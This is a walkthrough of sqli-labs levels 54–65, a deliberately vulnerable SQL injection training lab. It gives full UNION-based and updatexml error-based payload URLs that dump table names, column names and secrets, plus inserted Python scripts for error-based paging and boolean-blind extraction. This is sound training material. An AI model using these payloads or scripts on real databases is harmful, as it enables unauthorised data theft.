sqli-labs hands-on notes (4)

Less-54

Starting with this level the number of requests is limited, the database is switched to challenges, the table holding the secret has a random name, and once you go over the limit a new table and secret are issued.
Reading the source shows a plain single-quote closure:

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

Note that the query reads security.users, but the payloads below use table_schema=database(), and that resolves to challenges, the connection's default database, which is where the random table lives; that is why the table listing below finds it.

Dump the table name:

http://192.168.100.105/sqlilabs/Less-54/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

Dump the columns:

http://192.168.100.105/sqlilabs/Less-54/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='XG5G593V9H'%23

Dump the secret:

http://192.168.100.105/sqlilabs/Less-54/?id=-1' union select 1,secret_0IMA,3 from XG5G593V9H where id=1%23

Submit the secret you got to reset the attempt counter.

Less-55

This time the limit is 14 attempts.
Probe the closure first:

http://192.168.100.105/sqlilabs/Less-55/?id=1) %23

The page renders normally, and the UNION payloads below confirm that the parameter sits inside bare parentheses with no quotes.
Dump the table name:

http://192.168.100.105/sqlilabs/Less-55/?id=-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

Dump the columns:

http://192.168.100.105/sqlilabs/Less-55/?id=-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='8753JZ68TI' %23

Dump the secret:

http://192.168.100.105/sqlilabs/Less-55/?id=-1) union select 1,secret_UL8C,3 from 8753JZ68TI %23

Submit the secret to reset the counter.

Less-56

Probe first:
http://192.168.100.105/sqlilabs/Less-56/?id=1" %23
The page rendered normally, so I kept building double-quote payloads on top of that, and every one of them failed.
Only after reading the source did I see that the closure is actually a parenthesis plus a single quote. The reason the probe looked fine is this query:

SELECT * FROM security.users WHERE id=('1"#') LIMIT 0,1

Run it directly in the database and it really does return a row, so where is the problem?

The problem is implicit type conversion. MySQL converts between numbers and strings as the context demands, and when a numeric column is compared with a string, the string is converted to a number. That conversion keeps only the leading numeric prefix of the string: '1"#' becomes 1, '11fads' becomes 11, and a string with no numeric prefix becomes 0. Here id is an integer column, so id=('1"#') is evaluated as id=1; the " and the # never leave the string literal, nothing gets commented out, and the query simply returns the row for id 1. The rule only applies when one side is numeric: two strings are compared as strings, and '1"#' is not equal to '1'. The lesson is that a page rendering normally after you append a quote is not proof that you have found the closure; use a probe whose result has to change, such as an id that should return no row at all:

http://192.168.100.105/sqlilabs/Less-56/?id=-1') %23

That is the right closure: -1') ends both the string and the parenthesis, %23 comments out the rest, and the page shows no row.
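To make the conversion rule above concrete, here is an added Python example (not code from the original post or from sqli-labs) that mimics MySQL's string-to-number coercion and applies it to a constructed three-row stand-in for security.users. The regex, the sample rows and the helper names are this example's assumptions, modelled on MySQL's behaviour of using the longest numeric prefix of the string and 0 when there is none.

```python
import re

# MySQL converts a string to a number by taking its longest leading numeric
# prefix (optional sign, digits, decimal part, exponent); anything after that is
# dropped with a warning, and a string with no numeric prefix becomes 0.
# The regex is this example's approximation of that rule, not MySQL's own code.
_NUMERIC_PREFIX = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?")


def mysql_numeric_value(s: str) -> float:
    """Number MySQL uses for string s when the other operand is numeric."""
    m = _NUMERIC_PREFIX.match(s)
    return float(m.group(0)) if m else 0.0


def int_equals_string(column_value: int, literal: str) -> bool:
    """id = '<literal>' with id an INT column: the string side is coerced."""
    return float(column_value) == mysql_numeric_value(literal)


def string_equals_string(a: str, b: str) -> bool:
    """Two string operands are compared as strings; no coercion happens."""
    return a == b


# Constructed stand-in for security.users (only id and username).
USERS = [(1, "Dumb"), (2, "Angelina"), (3, "Dummy")]


def rows_for(id_param: str):
    """Rows returned by  SELECT * FROM users WHERE id=('<id_param>')  when the
    quotes are NOT broken out of, i.e. the whole parameter stays one string literal."""
    return [row for row in USERS if int_equals_string(row[0], id_param)]


if __name__ == "__main__":
    # The first two probes look "injected" but are just the row for id 1.
    for probe in ['1"#', '1" and 1=2#', "11fads", "abc"]:
        print(repr(probe), "->", mysql_numeric_value(probe), rows_for(probe))
```

The second probe is the trap from this level: '1" and 1=2#' still returns the row for id 1, because the whole thing is coerced to 1 and the condition is never evaluated as SQL.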
Dump the table name:

http://192.168.100.105/sqlilabs/Less-56/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

Dump the columns:

http://192.168.100.105/sqlilabs/Less-56/?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='HVL992XP27'%23

Dump the secret:

http://192.168.100.105/sqlilabs/Less-56/?id=-1') union select 1,secret_E2BQ,3 from HVL992XP27%23

Submit the secret to reset the counter.

Less-57

Try the closure:
http://192.168.100.105/sqlilabs/Less-57?id=-1" union select 1,2,3 %23
This one echoes the UNION columns, so it is the usual double-quote routine.
Dump the table name:

http://192.168.100.105/sqlilabs/Less-57?id=-1" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

Dump the columns:

http://192.168.100.105/sqlilabs/Less-57?id=-1" union select 1,group_concat(column_name),3 from information_schema.columns where table_name='YRA6E572GR' %23

Dump the secret:

http://192.168.100.105/sqlilabs/Less-57?id=-1" union select 1,secret_LA1G,3 from YRA6E572GR %23

Submit the secret to reset the counter.

Less-58

This level allows only 5 attempts,
but a single probe shows it is a single-quote closure.
UNION injection turns out to be useless here, because the page never echoes anything from the database: the displayed name and password are looked up in hard-coded arrays using the row's id, so whatever a UNION selects never reaches the output. This is the code responsible:

$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
// both values come from the fixed arrays, indexed by the row id, not from the row itself
echo 'Your Login name : '. $unames[$row['id']];
echo "<br>";
echo 'Your Password : ' .$pass[$row['id']];

MySQL errors are echoed further down the page, though, so error-based injection with updatexml works. Keep in mind that updatexml() only shows about 32 characters of the offending XPath expression, so a long group_concat() result has to be paged with substr(); the names here are short enough to fit in one request each, which matters with a 5-request budget.
Dump the table name:

http://192.168.100.105/sqlilabs/Less-58/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+

Dump the columns:

http://192.168.100.105/sqlilabs/Less-58/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='XXQT0FJQL2'),0x7e),1) --+

Dump the secret:

http://192.168.100.105/sqlilabs/Less-58/?id=1' and updatexml(1,concat(0x7e,(select secret_LVSS from XXQT0FJQL2),0x7e),1) --+

Submit the secret to reset the counter.

Less-59

Same error-based injection; the id is numeric, so there is no single or double quote to close and appending the comment is enough.
Dump the table name:

http://192.168.100.105/sqlilabs/Less-59/?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)%23

Dump the columns:

http://192.168.100.105/sqlilabs/Less-59/?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='CA4PGB5VU5'),0x7e),1)%23

Dump the secret:

http://192.168.100.105/sqlilabs/Less-59/?id=1 and updatexml(1,concat(0x7e,(select secret_O5UY from CA4PGB5VU5),0x7e),1)%23

Submit the secret to reset the counter.

Less-60

This time the closure is a double quote plus a parenthesis.
Dump the table name:

http://192.168.100.105/sqlilabs/Less-60/?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)%23

Dump the columns:

http://192.168.100.105/sqlilabs/Less-60/?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='ZIYD79H66Q'),0x7e),1)%23

Dump the secret:

http://192.168.100.105/sqlilabs/Less-60/?id=1") and updatexml(1,concat(0x7e,(select secret_JIPP from ZIYD79H66Q),0x7e),1)%23

Done with this one.

Less-61

This time it is a single quote plus two parentheses, which is fairly nasty.
Dump the table name:

http://192.168.100.105/sqlilabs/Less-61/?id=1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)%23

Dump the columns:

http://192.168.100.105/sqlilabs/Less-61/?id=1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='0NCH5HWI5Q'),0x7e),1)%23

Dump the secret:

http://192.168.100.105/sqlilabs/Less-61/?id=1')) and updatexml(1,concat(0x7e,(select secret_6IKU from 0NCH5HWI5Q),0x7e),1)%23

Done.
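Error-based extraction on Less-58 through Less-61 is the same procedure each time with a different closure, and the attempt counter makes every request count. The following Python script is an added example, not code from the original post or from sqli-labs: it builds the updatexml payload for a given closure, pages the subquery result through 30-character substr() windows because updatexml() reports only 32 characters of the bad XPath expression (two of them being the 0x7e markers), parses the leaked text out of the response, and counts requests against a budget. The fake_server, the FAKE_DB contents and the regexes are this example's assumptions; on the real lab you would replace send with an HTTP GET of /?id=<payload> against the level.

```python
import re

# Closures used on Less-58 .. Less-61 in this write-up; %23 ('#') is appended by build_payload.
CLOSERS = {"Less-58": "'", "Less-59": "", "Less-60": '")', "Less-61": "'))"}

# updatexml() echoes at most 32 characters of the offending XPath expression.
# Two of those are the 0x7e ('~') markers, so one request leaks at most 30 characters.
WINDOW = 30

TABLES_Q = ("select group_concat(table_name) from information_schema.tables "
            "where table_schema=database()")


def build_payload(closer: str, subquery: str, offset: int) -> str:
    """The id parameter for one request: close the original quoting, then raise an
    XPath error whose text is a WINDOW-sized slice of the subquery result."""
    window = f"substr(({subquery}),{offset},{WINDOW})"
    return f"1{closer} and updatexml(1,concat(0x7e,{window},0x7e),1)%23"


LEAK_RE = re.compile(r"XPATH syntax error: '~([^~']*)~?'")


def parse_leak(html: str):
    """Text between the ~ markers of the MySQL error, or None if no error was echoed."""
    m = LEAK_RE.search(html)
    return None if m is None else m.group(1)


def extract(send, closer: str, subquery: str, budget: int):
    """Page through the subquery result until a short window marks its end.
    send(id_param) must return the response body. Returns (value, requests_used)."""
    value, offset, used = "", 1, 0
    while used < budget:
        chunk = parse_leak(send(build_payload(closer, subquery, offset)))
        used += 1
        if chunk is None:
            raise RuntimeError("no XPATH error in response: wrong closure, or errors not echoed")
        value += chunk
        if len(chunk) < WINDOW:          # a partial window is the last one
            return value, used
        offset += WINDOW
    raise RuntimeError(f"budget of {budget} requests exhausted after {len(value)} chars")


# --- constructed stand-in for the vulnerable page (not the real sqli-labs code) ---
FAKE_DB = {TABLES_Q: "A1B2C3D4E5,F6G7H8I9J0,K1L2M3N4O5,P6Q7R8S9T0"}  # 43 chars: needs 2 windows
SUBSTR_RE = re.compile(r"substr\(\((.+)\),(\d+),(\d+)\),0x7e")


def fake_server(closer: str):
    """send() for a page whose query uses `closer`: a payload built for a different
    closure gets a generic syntax error, a matching one gets the 32-char XPATH error."""
    def send(id_param: str) -> str:
        if not id_param.startswith(f"1{closer} and "):
            return "You have an error in your SQL syntax"
        m = SUBSTR_RE.search(id_param)
        query, off, length = m.group(1), int(m.group(2)), int(m.group(3))
        chunk = FAKE_DB[query][off - 1: off - 1 + length]   # SQL substr() is 1-based
        return "XPATH syntax error: '" + ("~" + chunk + "~")[:32] + "'"
    return send


if __name__ == "__main__":
    for level, closer in CLOSERS.items():
        print(level, extract(fake_server(closer), closer, TABLES_Q, budget=5))
```

The end-of-result check relies on a window shorter than 30 characters; when the result length is an exact multiple of 30 the script spends one extra request on an empty window, which is worth knowing when the budget is 5.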

Less-62 to Less-65

These are all blind injection, but the attempt budget is too small to brute-force them by hand; I'll write a script for them once my algorithms are a bit better.
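Less-62 through Less-65 are boolean-blind, and the point above is that the request budget is the constraint. As an added example (not from the original post or from sqli-labs), the Python below performs boolean-blind extraction by binary search and counts the requests, so you can see what the budget has to cover: with the [0-9A-Z] alphabet the random table names on this page use, a 10-character name costs about 6 requests for the length plus 6 per character, 66 in the worst case. The payload builders mirror the closure style of the levels above; the make_oracles stand-in, the alphabet and max_len are assumptions, and on the real lab the two oracles would send the payloads and compare the returned page against the known true and false responses.

```python
import math

# The random table names on this page are all [0-9A-Z]; the alphabet is sorted by ASCII
# value so that "ascii(substr(x,pos,1)) > ord(c)" halves the candidate range each time.
ALPHABET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"


def length_payload(closer: str, subquery: str, n: int) -> str:
    """id parameter asking: is length(subquery) > n ?  (true page or false page)"""
    return f"1{closer} and length(({subquery}))>{n}%23"


def char_payload(closer: str, subquery: str, pos: int, value: int) -> str:
    """id parameter asking: is ascii(substr(subquery,pos,1)) > value ?"""
    return f"1{closer} and ascii(substr(({subquery}),{pos},1))>{value}%23"


def blind_extract(length_gt, char_gt, alphabet=ALPHABET, max_len=32):
    """Boolean-blind extraction by binary search. length_gt(n) and char_gt(pos, value)
    are oracles answering the two questions above. Returns (value, requests_used)."""
    requests = 0
    lo, hi = 0, max_len                    # smallest n with length <= n is the length
    while lo < hi:
        mid = (lo + hi) // 2
        requests += 1
        if length_gt(mid):
            lo = mid + 1
        else:
            hi = mid
    length = lo
    out = ""
    for pos in range(1, length + 1):
        lo, hi = 0, len(alphabet) - 1      # index range into the sorted alphabet
        while lo < hi:
            mid = (lo + hi) // 2
            requests += 1
            if char_gt(pos, ord(alphabet[mid])):
                lo = mid + 1
            else:
                hi = mid
        out += alphabet[lo]                # assumes every character is in the alphabet
    return out, requests


def worst_case_requests(length: int, alphabet_size: int, max_len: int = 32) -> int:
    """Upper bound on requests: one binary search for the length, one per character."""
    return math.ceil(math.log2(max_len + 1)) + length * math.ceil(math.log2(alphabet_size))


# --- constructed stand-in for a boolean-blind page (not the real sqli-labs code) ---
def make_oracles(secret: str):
    def length_gt(n):
        return len(secret) > n

    def char_gt(pos, value):
        ch = secret[pos - 1:pos]           # MySQL: ascii('') past the end is 0
        return (ord(ch) if ch else 0) > value

    return length_gt, char_gt


if __name__ == "__main__":
    secret = "XXQT0FJQL2"                  # table name from Less-58 above, reused as sample
    length_gt, char_gt = make_oracles(secret)
    print(blind_extract(length_gt, char_gt),
          "worst case", worst_case_requests(len(secret), len(ALPHABET)))
```

Restricting the alphabet is what keeps the count down: searching the full printable range (95 values) costs 7 requests per character instead of 6, and a wrong alphabet makes the search return a wrong character silently, so check the result with one final equality request if the budget allows it.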

Summary

Finally finished all the levels on this SQL injection platform. I've had a miserable cold lately... confetti~~~

